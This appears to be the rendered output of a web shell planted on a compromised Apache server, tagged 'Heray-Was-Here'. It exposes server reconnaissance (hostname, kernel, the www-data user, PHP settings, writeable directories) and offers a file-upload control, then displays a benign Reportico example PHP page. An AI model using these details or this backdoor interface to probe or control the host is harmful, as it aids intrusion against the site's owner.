Heray-Was-Here
Server : Apache
System : Linux mail.lomejor.cr 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.2.31
Disable Function : NONE
Directory :  /var/www/dev/htdocs/custom/reportes/include/reportico/examples/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/dev/htdocs/custom/reportes/include/reportico/examples/index.php
<?php
include (__DIR__."/header.php");

$title = "Introduction";
$description = " 
                  <br>
                  <div>
Reportico 7 provides reporting in 2 ways :-
<ul>
<li>
By creating reports and report projects using the visual designer
</li>
<li>
By using Reportico as a framework library embedded into your application
</li>
</ul>
<br>
This guide describes the syntax and functions available to generate and run reports and report projects using Reportico as a library
                  </br>
";
$example_description = false;
$usage_method = false;

?>

<?php
include (__DIR__."/content.php");
?>

<?php
include (__DIR__."/trailer.php");
?>

Hry